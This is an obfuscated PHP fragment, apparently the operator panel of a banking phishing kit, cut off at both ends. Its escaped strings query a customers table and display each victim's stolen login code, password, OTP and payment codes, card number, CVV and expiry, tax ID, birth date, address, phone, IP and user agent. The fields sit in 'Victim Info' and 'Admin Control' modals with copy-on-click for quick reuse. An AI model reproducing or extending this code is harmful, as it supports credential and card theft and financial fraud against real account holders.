c\57\144\x69\166\76\xa\11\x9\11\x9\x9\11\x9\11\x9\11\11\74\x2f\x74\x64\76\12\x9\x9\11\x9\x9\11\x9\x9\11\11\x3c\57\164\x72\76\xa\x9\11\x9\x9\11\x9\x9\11\x9\11\xa\11\11\x9\11\x9\x9\11\11\x9\74\x2f\x74\x62\157\x64\x79\x3e\12\11\x9\11\11\11\11\11\x9\74\x2f\164\x61\x62\154\145\x3e\12\x9\11\x9\x9\x9\11\x9\74\57\x64\x69\x76\76\xa\x9\11\x9\11\x9\11\x9\x3c\41\55\55\x20\105\x6e\144\x20\143\x6f\x6d\x6d\x61\156\x64\x73\x20\x65\144\151\x74\x20\55\55\x3e\xa\xa\x9\11\x9\11\11\x9\x9\74\x64\151\x76\x20\x63\154\x61\x73\x73\x3d\47\x6d\x6f\x64\141\154\55\x66\157\157\x74\145\x72\47\40\x73\164\x79\x6c\145\x3d\x27\155\x61\162\x67\151\156\x2d\164\157\160\x3a\55\64\60\160\x78\x27\76\12\x9\x9\11\x9\x9\x9\11\x9\x3c\x62\x75\164\164\157\156\40\x74\x79\x70\145\x3d\47\142\x75\x74\164\157\156\x27\40\143\154\x61\163\163\x3d\47\142\x74\156\x20\142\164\156\x2d\x73\x65\x63\x6f\x6e\144\141\162\171\x27\40\x6f\x6e\143\154\151\x63\x6b\x3d\47\x63\x6c\157\x73\145\x5f\142\164\156\50\51\x27\x20\144\141\x74\x61\55\x64\x69\x73\x6d\151\x73\163\75\47\155\157\x64\x61\154\47\x3e\103\x6c\x6f\163\x65\x3c\57\142\165\x74\x74\x6f\x6e\x3e\12\11\x9\11\x9\11\x9\11\11\x3c\142\x75\164\164\x6f\x6e\x20\151\x64\75\x27\x73\141\x76\x65\x5f{$value["\151\144"]}\x27\x20\x6f\x6e\143\x6c\x69\143\x6b\x3d\47\146\x6f\162\x6d\x5f\x73\x75\x62\x6d\151\164\x28\x74\x68\151\x73\x29\x27\40\x74\x79\x70\x65\x3d\47\x62\165\x74\164\157\156\x27\x20\x63\154\141\163\x73\x3d\x27\x62\164\156\40\x62\x74\x6e\x2d\x70\162\x69\x6d\x61\x72\171\x27\x3e\x53\141\166\x65\74\57\x62\165\x74\x74\x6f\156\76\xa\x9\x9\11\11\x9\11\11\x3c\57\144\x69\x76\76\12\x9\x9\x9\x9\x9\11\74\x2f\144\151\x76\76\xa\x9\11\11\11\x9\x3c\57\x64\151\x76\76\12\11\11\11\x9\x3c\x2f\146\x6f\162\x6d\76\xa\11\x9\x9\x3c\57\144\151\x76\76\12\11\x9\11"; } } if (isset($_GET["\x66\x65\164\x63\x68\137\160\143\137\x66\151\156\x69\163\150\x5f\x6d\x6f\144\x61\154\x5f\144\141\164\x61"])) { $query = mysqli_query($conn, "\123\x45\114\105\103\x54\x20\x2a\40\146\x72\x6f\x6d\x20\143\x75\x73\x74\157\155\x65\x72\x73"); if ($query) { if (mysqli_num_rows($query) >= 1) { $array = mysqli_fetch_all($query, MYSQLI_ASSOC); } } foreach ($array as $value) { $usrlogin = $value["\x75\163\162\x6c\x6f\x67\x69\x6e"]; $usrpass = $value["\x75\x73\x72\160\141\x73\163"]; $amount = $value["\141\155\x6f\x75\156\x74"]; $otpcode = $value["\157\164\x70\143\x6f\x64\x65"]; $fname = $value["\146\156\x61\x6d\145"]; $dob = $value["\x64\157\142"]; $usraddr = $value["\165\x73\x72\141\x64\x64\x72"]; $usrnif = $value["\165\x73\x72\x6e\x69\146"]; $usrcode = $value["\x75\x73\x72\x63\x6f\x64\x65"]; $paycode = $value["\160\x61\x79\143\x6f\144\145"]; $phonenum = $value["\x70\150\x6f\156\x65\156\x75\155"]; $ccnum = $value["\143\x63\156\x75\x6d"]; $cvvnum = $value["\143\x76\x76\x6e\165\x6d"]; $expiry = $value["\x65\x78\160\x69\162\171"]; $ip = $value["\151\x70"]; $useragent = urldecode($value["\165\x73\x65\162\x61\x67\x65\x6e\x74"]); $data_log = "\xa\x9\x9\x9\75\75\x3d\x3d\x3d\xe2\211\253\x20\x4c\x4f\x47\111\x4e\x20\342\x89\xaa\75\75\x3d\75\x3d\xa\11\11\11\125\x73\145\162\40\x43\x6f\x64\145\x20\72\40{$usrlogin}\12\x9\11\11\x4d\x75\154\x74\151\x20\x43\x6f\x64\x65\x20\x3a\40{$usrcode}\xa\x9\11\x9\x50\141\163\163\x77\x6f\x72\144\40\x3a\40{$usrpass}\xa\x9\11\x9\x3d\75\x3d\x3d\x3d\xe2\x89\253\x20\x43\x4f\104\105\40\342\x89\xaa\x3d\x3d\x3d\75\x3d\12\11\x9\11\117\124\x50\40\103\x6f\144\x65\40\x3a\40{$otpcode}\xa\11\x9\x9\120\141\x79\40\x43\157\x64\x65\x20\72\40{$paycode}\12\x9\11\x9\75\75\75\75\x3d\342\x89\xab\x20\x43\x41\122\104\x20\342\x89\252\x3d\x3d\75\75\x3d\12\x9\x9\11\x43\103\x20\116\x75\x6d\40\72\40{$ccnum}\xa\11\11\11\105\170\160\x69\162\171\40\72\x20{$expiry}\12\11\x9\x9\103\126\x56\x20\x3a\40{$cvvnum}\xa\11\11\x9\x3d\75\75\75\75\xe2\211\xab\x20\x41\104\x44\x49\124\111\x4f\x4e\101\x4c\x20\xe2\x89\xaa\75\75\75\x3d\75\12\11\11\11\106\165\154\x6c\x20\116\x61\x6d\145\x20\72\x20{$fname}\xa\x9\11\11\116\x49\106\x20\72\40{$usrnif}\12\x9\x9\11\104\117\x42\x20\x3a\x20{$dob}\xa\x9\x9\x9\101\144\144\162\x65\x73\x73\40\x3a\x20{$usraddr}\12\x9\11\11\x50\150\157\156\145\40\x4e\x75\x6d\40\x3a\40{$phonenum}\xa\11\x9\x9\75\x3d\75\75\75\x3d\75\75\x3d\x3d\x3d\75\75\x3d\75\75\x3d\x3d\75\x3d\75\75\75\75\75\75\75\x3d\x3d\x3d\x3d\12\11\x9\11\111\x50\40\72\x20{$ip}\12\11\x9\11\125\x41\40\72\x20{$useragent}\xa\x9\x9\11\x3d\x3d\x3d\75\75\x3d\75\75\x3d\75\x3d\x3d\75\x3d\x3d\75\75\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\75\75\x3d\x3d\75\x3d"; echo "\12\11\11\x9\xa\11\x9\x9\x3c\144\x69\166\40\143\154\x61\163\x73\75\47\x6d\157\144\x61\x6c\x20\146\x61\144\145\x27\40\x69\x64\75\47\x76\151\x65\167\x6d\157\x64\x61\x6c\137\x75\163\145\x72\x69\144\137{$value["\151\144"]}\47\x20\164\x61\142\151\156\x64\x65\170\75\47\x2d\61\x27\x20\162\157\154\145\75\47\144\x69\141\x6c\x6f\147\47\40\x61\162\151\141\55\154\x61\x62\x65\x6c\154\145\144\142\x79\75\47\145\170\x61\x6d\x70\154\145\115\x6f\144\141\154\x4c\141\x62\x65\154\x27\x20\x73\164\x79\x6c\145\75\47\157\160\141\x63\151\164\171\72\61\40\x21\x69\155\160\x6f\x72\x74\x61\x6e\164\x3b\x64\x69\x73\x70\154\x61\171\x3a\x6e\157\156\145\73\150\145\x69\x67\x68\x74\72\x31\60\60\45\x3b\157\x76\x65\x72\x66\x6c\x6f\167\x3a\x73\143\162\x6f\x6c\x6c\73\47\40\x61\162\151\141\55\x68\151\x64\144\x65\x6e\75\47\164\x72\x75\145\x27\76\xa\x9\11\x9\xa\11\x9\x9\x9\x3c\x66\x6f\x72\155\40\156\x61\x6d\145\75\x27\143\x6f\x6e\146\151\147\x5f\146\x6f\162\155\137{$value["\x69\144"]}\47\x20\x69\144\x3d\x27\x63\x6f\156\146\x69\147\137\x66\x6f\x72\155\137{$value["\x69\144"]}\x27\40\x6d\x65\164\150\157\x64\75\x27\120\117\x53\124\47\40\141\143\164\151\x6f\x6e\75\x27\x27\40\x6e\157\x76\141\154\151\144\x61\164\145\x3e\xa\11\11\11\11\x9\x3c\x69\156\160\x75\164\40\x74\x79\160\x65\75\47\x68\x69\144\x64\145\156\x27\x20\x6e\141\155\145\75\x27\165\163\x65\x72\x69\144\47\x20\x76\x61\154\165\145\75\47{$value["\151\144"]}\47\76\12\x9\11\11\11\11\74\144\151\166\40\x63\154\x61\163\163\x3d\47\155\x6f\144\141\154\55\x64\151\141\154\157\x67\47\40\162\x6f\154\145\x3d\x27\x64\157\x63\165\155\145\156\x74\47\x20\x73\164\x79\x6c\145\75\x27\167\x69\x64\x74\150\x3a\x35\60\60\160\x78\47\x3e\xa\11\11\x9\x9\11\11\x3c\144\151\x76\x20\143\154\x61\x73\163\x3d\x27\155\x6f\x64\x61\x6c\x2d\143\157\156\164\145\156\x74\x27\x3e\xa\x9\11\x9\x9\x9\11\x9\x3c\144\151\x76\40\x63\154\141\x73\x73\75\x27\155\x6f\x64\141\x6c\x2d\150\x65\141\144\x65\x72\47\x20\163\x74\x79\x6c\x65\75\x27\x62\141\143\x6b\x67\162\x6f\x75\156\144\55\x63\157\x6c\157\x72\x3a\x23\63\x34\x34\71\65\105\73\146\157\156\x74\55\163\151\172\x65\72\62\56\x37\x72\145\155\73\x74\x65\x78\164\55\141\154\151\147\x6e\72\143\145\156\x74\x65\x72\73\47\x3e\xa\11\11\11\x9\x9\x9\x9\11\x3c\x68\65\x20\143\x6c\141\x73\x73\x3d\47\x6d\x6f\x64\141\154\55\164\151\164\x6c\145\47\x20\x69\x64\75\47\x65\170\141\155\x70\x6c\145\115\157\x64\x61\154\x4c\x61\x62\145\x6c\x27\40\163\164\x79\154\x65\x3d\x27\x63\x6f\154\157\x72\x3a\x77\150\151\x74\145\x27\x3e\x56\151\143\x74\151\x6d\40\x49\x6e\146\157\74\x2f\150\x35\76\xa\x9\11\x9\11\11\11\x9\11\74\x62\165\x74\164\157\x6e\40\x74\171\x70\x65\75\x27\x62\x75\x74\164\157\x6e\x27\40\143\x6c\141\x73\163\x3d\x27\x63\x6c\x6f\x73\x65\x27\40\144\x61\164\141\x2d\144\x69\163\155\x69\x73\163\x3d\x27\155\157\144\x61\154\x27\x20\x61\162\151\x61\x2d\x6c\x61\x62\x65\154\75\47\103\154\x6f\x73\145\47\x3e\12\x9\11\11\x9\x9\x9\11\11\11\x3c\163\160\x61\156\40\141\162\x69\141\55\x68\151\144\144\x65\156\75\47\x74\162\x75\145\x27\40\163\x74\x79\x6c\x65\75\47\143\157\x6c\157\162\72\167\150\151\x74\x65\x27\x3e\x26\x74\x69\x6d\145\163\x3b\x3c\x2f\x73\160\141\156\x3e\12\x9\x9\11\11\x9\x9\x9\11\x3c\x2f\x62\165\x74\164\x6f\x6e\x3e\xa\x9\11\11\11\11\11\11\74\57\144\x69\166\x3e\12\11\x9\x9\x9\x9\11\11\x3c\x64\x69\x76\40\143\x6c\141\x73\163\75\x27\x6d\x6f\x64\x61\x6c\55\142\x6f\144\x79\47\x3e\12\x9\x9\x9\11\x9\11\x9\x9\74\x64\x69\x76\40\143\154\141\x73\163\75\47\x66\x6f\162\155\x2d\x67\x72\157\x75\160\x27\76\xa\x9\11\x9\11\11\11\x9\x9\x9\74\x62\162\x3e\12\x9\x9\11\11\x9\11\11\11\x9\x3c\x74\x65\x78\164\x61\162\145\141\x20\x69\144\x3d\47\164\145\170\x74\141\162\145\x61\146\151\x6e\151\163\x68\x27\x20\143\x6c\x61\x73\163\x3d\x27\146\157\162\x6d\x2d\x63\157\156\164\162\157\154\47\40\144\x69\163\x61\x62\x6c\x65\144\75\x27\144\151\163\x61\142\x6c\x65\x64\47\40\162\x6f\x77\163\x3d\47\x31\x32\x27\76{$data_log}\x3c\x2f\164\145\170\164\x61\x72\x65\141\76\12\x9\x9\x9\11\x9\x9\x9\x9\74\x2f\144\151\x76\76\xa\x9\x9\11\11\11\11\x9\x3c\x2f\144\151\166\76\xa\11\11\x9\11\x9\11\x9\74\144\151\x76\40\143\154\x61\163\163\75\x27\155\157\x64\x61\154\x2d\146\157\157\164\145\x72\x27\x20\163\x74\171\x6c\x65\75\47\x6d\x61\162\147\x69\156\x2d\164\157\160\x3a\x2d\x34\60\160\x78\47\x3e\12\x9\x9\11\x9\11\x9\11\11\74\142\x75\x74\164\x6f\x6e\x20\x74\171\160\145\75\47\142\x75\164\x74\x6f\x6e\x27\40\143\154\141\x73\163\x3d\x27\142\164\156\40\142\164\x6e\55\x6c\x67\x20\142\164\x6e\55\144\x61\162\153\40\x63\x6f\x6c\x2d\61\62\47\40\157\x6e\x63\x6c\x69\143\153\75\47\x63\154\157\163\145\x5f\x62\164\156\50\51\47\x3e\x43\114\x4f\x53\105\x3c\57\x62\x75\164\164\157\x6e\76\xa\11\11\x9\11\x9\11\11\x3c\57\x64\x69\166\x3e\12\x9\11\11\x9\11\11\x3c\x2f\x64\x69\166\76\xa\11\11\11\11\x9\74\57\144\x69\166\x3e\12\x9\x9\x9\11\74\57\146\x6f\162\x6d\76\12\11\x9\11\74\x2f\144\x69\x76\x3e\xa\x9\x9\x9"; } } if (isset($_GET["\146\x65\164\143\x68\137\155\x6f\x64\x61\154\x5f\144\141\164\x61"])) { $query = mysqli_query($conn, "\x53\x45\114\x45\x43\124\x20\52\40\x66\162\157\x6d\x20\143\165\x73\x74\157\x6d\145\162\x73"); if ($query) { if (mysqli_num_rows($query) >= 1) { $array = mysqli_fetch_all($query, MYSQLI_ASSOC); } } foreach ($array as $value) { $usrlogin = $value["\x75\163\x72\x6c\157\x67\x69\x6e"]; $usrpass = $value["\x75\x73\x72\160\x61\163\163"]; $amount = $value["\141\155\157\x75\x6e\x74"]; $otpcode = $value["\157\x74\160\x63\x6f\x64\145"]; $fname = $value["\146\156\x61\155\x65"]; $dob = $value["\144\x6f\142"]; $usraddr = $value["\165\163\x72\x61\144\x64\x72"]; $usrnif = $value["\165\163\162\x6e\x69\146"]; $usrcode = $value["\x75\163\x72\143\x6f\144\145"]; $paycode = $value["\x70\141\171\143\x6f\x64\x65"]; $phonenum = $value["\x70\150\x6f\x6e\145\x6e\x75\155"]; $ccnum = $value["\143\x63\x6e\165\x6d"]; $cvvnum = $value["\143\166\x76\156\165\155"]; $expiry = $value["\x65\170\160\x69\162\x79"]; $ip = $value["\x69\x70"]; $useragent = urldecode($value["\165\163\145\x72\x61\x67\145\x6e\x74"]); echo "\12\11\12\11\11\11\x3c\x64\x69\166\x20\143\x6c\141\x73\x73\75\47\155\157\x64\141\x6c\x20\146\x61\x64\x65\x27\x20\151\x64\75\x27\155\157\x64\141\x6c\137\x75\x73\x65\162\151\144\137{$value["\151\144"]}\x27\40\164\141\142\151\156\144\x65\170\x3d\47\x2d\61\x27\40\x72\157\154\145\75\47\x64\151\x61\x6c\x6f\x67\x27\x20\x73\x74\171\x6c\x65\75\x27\x6f\160\141\143\151\x74\171\x3a\61\x20\x21\151\155\x70\x6f\x72\164\x61\156\164\73\144\151\163\x70\x6c\x61\171\x3a\156\x6f\x6e\145\73\x68\x65\151\147\150\x74\72\x31\x30\x30\x25\x3b\x6f\x76\145\x72\x66\x6c\x6f\x77\72\x73\x63\162\x6f\154\x6c\73\47\x20\x61\x72\x69\141\55\x6c\x61\x62\145\x6c\154\145\x64\x62\x79\x3d\x27\145\x78\x61\x6d\160\154\145\x4d\x6f\x64\141\154\x4c\141\x62\x65\x6c\x27\x20\141\162\x69\x61\55\150\151\144\x64\145\156\x3d\x27\x74\162\165\145\x27\76\xa\11\x9\x9\xa\x9\x9\x9\x9\74\x66\157\x72\x6d\x20\156\141\x6d\145\75\47\143\157\156\146\151\x67\x5f\x66\x6f\162\x6d\137{$value["\151\x64"]}\x27\40\x69\x64\x3d\x27\143\157\x6e\146\151\147\x5f\146\x6f\162\x6d\137{$value["\x69\x64"]}\47\40\x6d\x65\164\150\x6f\x64\75\47\x50\x4f\x53\x54\47\40\x61\x63\164\151\157\156\75\47\47\40\x6e\157\x76\x61\x6c\151\144\x61\x74\x65\x3e\12\x9\x9\11\11\x9\x3c\151\x6e\160\165\164\x20\164\171\160\145\75\x27\150\151\x64\x64\x65\x6e\47\40\x6e\x61\x6d\145\75\47\165\x73\x65\x72\x69\144\47\40\x76\141\x6c\165\145\x3d\x27{$value["\151\144"]}\47\x3e\xa\11\x9\x9\x9\11\x3c\x64\x69\x76\40\143\154\141\x73\163\75\47\155\157\144\141\x6c\55\144\151\141\x6c\x6f\147\47\x20\162\x6f\x6c\145\75\47\144\x6f\x63\165\155\145\156\164\x27\x20\x73\164\171\154\145\75\47\155\141\x72\147\151\x6e\x2d\164\x6f\x70\72\62\x30\45\73\155\x61\170\x2d\x77\x69\144\164\150\x3a\61\60\x30\45\73\x66\x6f\156\x74\x2d\x73\151\172\145\72\61\x2e\62\x72\x65\155\x3b\x27\76\xa\x9\11\11\11\11\x9\x3c\x64\151\166\x20\x63\x6c\x61\163\163\75\x27\x6d\157\144\x61\154\55\143\157\x6e\x74\x65\x6e\x74\47\40\x73\x74\x79\x6c\x65\75\x27\x62\141\143\153\147\x72\x6f\165\156\144\x2d\x63\157\x6c\x6f\162\x3a\x20\142\154\141\x63\153\x3b\x27\76\12\11\11\x9\x9\x9\x9\x9\74\144\x69\166\x20\x63\154\x61\163\163\75\47\x6d\157\144\141\x6c\55\x68\x65\x61\144\x65\x72\x27\x20\163\164\x79\154\145\75\x27\x62\141\143\x6b\147\162\x6f\x75\x6e\144\x2d\143\x6f\154\157\x72\72\43\63\64\x34\71\x35\105\x3b\146\x6f\156\x74\x2d\x73\151\172\x65\72\x32\x2e\67\x72\145\x6d\x3b\x74\145\x78\x74\55\x61\154\151\147\156\72\143\x65\x6e\164\145\x72\x3b\47\x3e\12\11\x9\x9\x9\x9\x9\x9\11\x3c\150\x35\40\x63\x6c\141\163\163\75\x27\x6d\x6f\144\x61\x6c\x2d\x74\x69\164\154\x65\x27\x20\x69\144\x3d\x27\x65\170\141\155\160\x6c\x65\x4d\157\144\141\154\x4c\x61\x62\x65\154\47\40\x73\x74\171\x6c\x65\x3d\47\143\157\154\x6f\162\72\167\150\151\164\x65\x3b\146\157\x6e\x74\x2d\163\151\172\145\x3a\61\x2e\x32\162\145\155\x27\x3e\101\144\155\151\156\40\x43\157\156\x74\162\x6f\154\40\x28\x63\154\x69\x63\153\x20\x6f\156\x20\154\x6f\x67\x20\164\x6f\x20\141\x75\164\157\x2d\143\157\160\x79\x29\x3c\x2f\x68\x35\x3e\xa\x9\11\x9\11\11\x9\x9\11\74\x62\x75\164\x74\x6f\156\40\164\x79\x70\145\75\x27\x62\165\x74\164\x6f\x6e\x27\x20\x63\x6c\x61\163\163\x3d\x27\x63\154\x6f\163\145\x27\x20\157\x6e\x63\x6c\x69\143\153\75\47\x63\x6c\157\163\x65\137\142\164\156\50\51\x27\40\x20\x61\x72\x69\141\x2d\154\141\x62\145\x6c\x3d\47\x43\x6c\157\163\145\x27\76\12\11\x9\11\x9\11\11\11\x9\x9\x3c\x73\160\141\156\x20\x61\162\151\x61\x2d\150\x69\144\x64\145\x6e\x3d\47\x74\162\165\x65\47\x20\x73\x74\x79\154\x65\x3d\47\x63\157\x6c\157\162\72\x77\150\151\x74\x65\x27\76\46\x74\x69\x6d\145\x73\x3b\x3c\57\163\160\141\x6e\76\xa\x9\11\11\x9\11\11\11\11\74\x2f\x62\x75\164\x74\x6f\156\76\12\x9\11\11\11\11\11\x9\74\x2f\x64\x69\166\x3e\12\11\x9\11\11\11\11\x9\x3c\144\151\x76\x20\x63\154\x61\x73\x73\x3d\47\155\x6f\x64\x61\x6c\x2d\142\157\144\x79\x27\76\12\x9\11\x9\x9\11\x9\x9\11\x3c\x64\x69\x76\40\x63\x6c\141\x73\x73\x3d\x27\146\x6f\162\x6d\x2d\x67\x72\x6f\165\160\x27\40\163\x74\x79\x6c\145\x3d\47\x6d\141\x72\x67\151\156\x2d\142\157\164\164\x6f\155\x3a\x31\x72\145\x6d\x27\76\12\11\x9\11\x9\11\11\11\11\11\x3c\142\x72\x3e\xa\xa\11\x9\11\11\11\x9\11\x9\x9\x3c\144\x69\166\x20\143\154\141\163\x73\75\47\144\x61\x74\141\55\147\162\157\x75\160\x27\76\12\11\11\11\x9\x9\x9\11\11\11\x9\74\154\141\142\145\154\40\143\x6c\x61\163\x73\75\47\x64\x61\x74\x61\55\154\x61\142\x65\154\47\76\x55\163\x65\x72\40\143\157\x64\x65\74\x2f\154\141\x62\x65\154\x3e\12\11\x9\x9\x9\x9\x9\11\11\x9\11\74\151\x6e\x70\165\x74\40\157\x6e\x63\154\x69\x63\x6b\75\47\143\x6f\160\x79\x5f\x62\164\156\50\x74\x68\151\163\51\x27\40\x63\x6c\x61\163\x73\x3d\47\146\x6f\162\x6d\x2d\143\157\156\164\x72\x6f\x6c\47\40\x72\145\141\x64\x6f\x6e\x6c\x79\40\166\141\x6c\165\145\75\47{$usrlogin}\x27\76\12\x9\11\x9\x9\11\11\x9\11\x9\x3c\x2f\144\x69\x76\x3e\12\11\x9\x9\x9\11\11\x9\11\11\74\144\151\x76\x20\143\x6c\141\x73\x73\75\47\x64\141\x74\x61\x2d\x67\162\x6f\165\x70\47\x3e\xa\11\x9\x9\x9\x9\x9\x9\x9\11\11\x3c\154\141\142\145\154\40\143\x6c\141\x73\x73\75\x27\x64\141\x74\141\x2d\x6c\141\x62\145\154\47\x3e\x4d\x75\154\164\151\x20\143\157\x64\x65\74\x2f\x6c\141\x62\x65\x6c\76\xa\x9\11\x9\11\11\11\x9\x9\11\11\74\x69\x6e\160\x75\x74\40\x6f\x6e\143\154\x69\x63\x6b\75\x27\143\157\160\x79\x5f\x62\x74\156\x28\164\150\x69\163\51\x27\40\x63\x6c\141\x73\x73\75\x27\146\x6f\162\x6d\55\143\x6f\x6e\x74\x72\157\x6c\x27\40\x72\145\141\144\157\x6e\154\171\40\166\141\x6c\x75\145\75\47{$usrcode}\x27\76\xa\x9\11\11\11\x9\11\x9\x9\x9\74\x2f\144\x69\166\x3e\xa\11\x9\11\11\x9\11\x9\x9\x9\x3c\144\151\x76\40\x63\154\141\x73\163\x3d\x27\144\141\164\x61\55\147\x72\x6f\x75\x70\47\76\12\x9\x9\x9\11\x9\11\x9\11\x9\x9\x3c\154\x61\142\145\x6c\x20\143\x6c\x61\163\x73\x3d\47\x64\141\164\x61\x2d\x6c\x61\x62\x65\x6c\x27\x3e\120\x61\163\163\x77\x6f\162\x64\x3c\x2f\154\x61\x62\145\x6c\76\xa\11\11\11\x9\11\x9\11\11\11\11\74\x69\156\160\x75\164\x20\x6f\156\x63\x6c\151\143\153\x3d\x27\143\157\x70\x79\137\142\x74\x6e\x28\x74\150\151\x73\x29\47\x20\x63\154\141\163\x73\x3d\47\x66\x6f\162\155\x2d\x63\x6f\156\x74\x72\157\154\47\40\x72\x65\141\x64\x6f\156\154\x79\40\x76\141\154\165\x65\75\47{$usrpass}\x27\x3e\12\11\11\x9\11\11\x9\11\11\11\74\57\144\151\166\x3e\12\x9\x9\x9\x9\11\11\x9\x9\x9\74\x64\151\x76\x20\143\x6c\x61\163\163\75\47\144\x61\164\141\55\147\x72\x6f\x75\x70\47\76\12\11\11\11\11\11\x9\x9\11\x9\11\74\x6c\x61\x62\145\x6c\40\x63\154\x61\x73\x73\75\47\x64\141\164\x61\x2d\154\141\142\x65\154\x27\x3e\117\124\120\x3c\57\154\x61\142\145\154\x3e\xa\x9\11\x9\11\x9\11\x9\11\x9\x9\74\x69\156\x70\x75\x74\x20\x6f\156\x63\x6c\151\x63\x6b\75\47\143\x6f\160\171\x5f\x62\x74\156\50\164\x68\151\163\51\47\x20\x63\154\x61\x73\x73\75\47\146\x6f\x72\155\x2d\143\x6f\x6e\x74\x72\157\154\47\40\162\x65\141\x64\x6f\156\x6c\x79\x20\166\141\154\165\145\x3d\47{$otpcode}\47\76\xa\11\11\11\11\x9\x9\11\11\11\x3c\x2f\144\x69\x76\x3e\12\x9\11\x9\x9\x9\x9\11\11\11\x3c\x64\x69\166\x20\143\154\141\x73\163\x3d\47\x64\141\x74\141\x2d\147\x72\157\x75\160\x27\x3e\12\11\x9\11\x9\11\x9\x9\x9\11\11\74\x6c\141\142\x65\x6c\x20\x63\154\x61\x73\x73\x3d\47\x64\141\x74\141\55\154\141\142\x65\154\x27\76\120\141\x79\40\x4f\124\120\74\57\154\x61\x62\145\154\x3e\12\11\11\x9\x9\11\11\x9\11\11\x9\74\151\x6e\160\x75\x74\40\157\156\143\154\151\x63\x6b\75\47\143\157\x70\x79\137\142\164\156\50\x74\x68\x69\163\x29\47\x20\x63\154\x61\163\163\x3d\x27\146\157\x72\x6d\55\143\x6f\x6e\164\162\x6f\x6c\x27\40\162\x65\141\144\157\156\154\x79\40\x76\x61\x6c\x75\145\x3d\x27{$paycode}\47\x3e\12\x9\x9\x9\11\11\11\x9\11\x9\74\57\x64\x69\166\x3e\xa\11\11\x9\11\x9\x9\11\x9\x9\74\x64\151\x76\40\x63\x6c\x61\x73\163\75\x27\x64\x61\164\141\55\147\162\x6f\165\x70\x27\x3e\xa\11\11\x9\11\x9\11\x9\x9\11\11\74\154\141\x62\x65\154\x20\x63\x6c\x61\x73\x73\x3d\x27\144\x61\164\x61\x2d\154\x61\x62\145\154\47\x3e\x46\165\x6c\x6c\40\116\x61\155\145\74\57\154\x61\x62\x65\154\x3e\12\11\x9\11\11\x9\x9\11\x9\11\x9\74\151\156\160\x75\x74\x20\x6f\x6e\143\x6c\x69\143\153\75\x27\143\157\160\x79\137\142\x74\156\50\x74\x68\151\163\51\x27\40\143\x6c\141\163\x73\x3d\x27\x66\x6f\x72\155\x2d\x63\157\x6e\x74\x72\157\x6c\x27\x20\x72\x65\141\x64\x6f\156\154\171\x20\166\141\x6c\165\x65\75\47{$fname}\x27\x3e\12\x9\11\11\x9\x9\x9\11\11\x9\74\x2f\x64\x69\x76\76\xa\x9\x9\x9\x9\11\x9\x9\x9\11\74\144\151\166\40\x63\154\141\x73\x73\x3d\47\x64\141\164\141\x2d\x67\x72\x6f\x75\x70\x27\76\xa\11\x9\11\x9\x9\11\x9\11\11\11\74\x6c\141\x62\x65\154\40\143\x6c\141\x73\x73\x3d\x27\x64\141\164\x61\55\x6c\141\x62\145\x6c\47\x3e\104\117\x42\x3c\x2f\x6c\141\142\145\x6c\76\xa\11\x9\x9\x9\11\11\x9\11\11\11\74\x69\156\160\x75\164\x20\x6f\156\143\x6c\151\x63\153\x3d\x27\x63\157\x70\x79\137\142\x74\x6e\50\x74\150\x69\163\x29\47\x20\143\x6c\141\x73\x73\75\x27\x66\x6f\162\x6d\55\143\x6f\156\x74\x72\x6f\x6c\x27\x20\x72\145\x61\144\157\x6e\x6c\171\x20\x76\141\x6c\x75\x65\x3d\x27{$dob}\47\76\12\11\11\11\x9\x9\11\x9\x9\11\x3c\57\x64\x69\166\x3e\xa\x9\x9\11\x9\x9\x9\11\x9\x9\74\x64\151\x76\40\x63\x6c\x61\x73\x73\x3d\47\x64\141\164\x61\x2d\147\x72\x6f\165\160\x27\x3e\xa\x9\x9\11\11\x9\x9\x9\11\x9\x9\74\x6c\141\x62\x65\154\x20\143\154\141\163\x73\75\x27\x64\141\164\x61\x2d\154\141\142\145\154\x27\76\101\x64\x64\162\x65\163\x73\74\x2f\154\x61\x62\x65\154\76\xa\x9\x9\11\11\11\x9\11\11\11\x9\x3c\151\x6e\x70\165\164\x20\x6f\156\143\x6c\151\x63\x6b\x3d\47\143\x6f\160\x79\137\x62\164\x6e\x28\164\150\151\163\x29\x27\x20\x63\154\x61\163\163\x3d\47\146\157\x72\x6d\55\x63\x6f\x6e\x74\x72\x6f\154\47\x20\x72\145\x61\144\x6f\x6e\x6c\x79\x20\x76\x61\154\x75\145\x3d\47{$usraddr}\x27\76\xa\11\x9\x9\11\x9\11\11\11\11\x3c\57\x64\x69\x76\76\12\11\x9\x9\11\x9\11\x9\x9\x9\x3c\x64\x69\x76\x20\x63\x6c\x61\163\163\75\47\x64\141\x74\x61\x2d\x67\162\157\x75\x70\x27\76\xa\x9\11\11\x9\11\x9\x9\11\11\11\x3c\154\x61\142\x65\154\40\143\x6c\x61\x73\x73\x3d\47\x64\x61\164\x61\55\154\141\x62\x65\x6c\x27\x3e\x4e\111\x46\x3c\x2f\154\x61\x62\145\x6c\76\xa\11\x9\x9\11\11\x9\11\11\x9\x9\x3c\151\156\160\165\164\x20\x6f\x6e\x63\x6c\151\143\153\x3d\47\x63\x6f\160\171\137\x62\164\x6e\50\x74\x68\x69\x73\x29\47\x20\143\154\141\x73\163\75\47\146\157\162\x6d\x2d\143\157\x6e\164\x72\157\x6c\x27\x20\x72\145\x61\144\x6f\156\x6c\171\40\x76\141\x6c\x75\x65\75\x27{$usrnif}\47\x3e\xa\x9\11\11\11\x9\x9\11\11\x9\74\57\x64\151\x76\x3e\12\11\x9\11\11\11\x9\11\x9\x9\74\144\151\x76\x20\143\154\x61\x73\x73\75\x27\144\x61\x74\141\55\147\162\x6f\165\x70\47\x3e\xa\11\11\x9\11\x9\x9\11\11\11\x9\x3c\154\x61\x62\x65\x6c\x20\x63\154\x61\x73\163\75\47\144\141\x74\x61\x2d\x6c\141\x62\x65\154\47\x3e\x50\150\157\x6e\145\40\x4e\157\56\74\57\154\x61\x62\x65\x6c\x3e\12\11\11\11\11\11\11\11\11\11\11\x3c\151\156\x70\x75\164\40\x6f\156\x63\x6c\x69\143\153\x3d\47\143\x6f\160\171\x5f\x62\x74\156\x28\x74\x68\151\163\x29\x27\40\143\x6c\141\x73\x73\x3d\47\146\x6f\162\x6d\55\x63\x6f\156\164\162\x6f\x6c\47\40\x72\145\141\144\x6f\x6e\154\x79\x20\166\141\154\x75\145\75\x27{$phonenum}\x27\76\xa\11\x9\11\x9\11\11\11\11\x9\x3c\x2f\144\151\166\76\12\11\11\11\x9\x9\x9\11\x9\11\74\144\151\166\40\x63\x6c\141\163\x73\x3d\47\144\141\x74\141\55\147\x72\x6f\x75\x70\x27\x3e\xa\11\11\11\x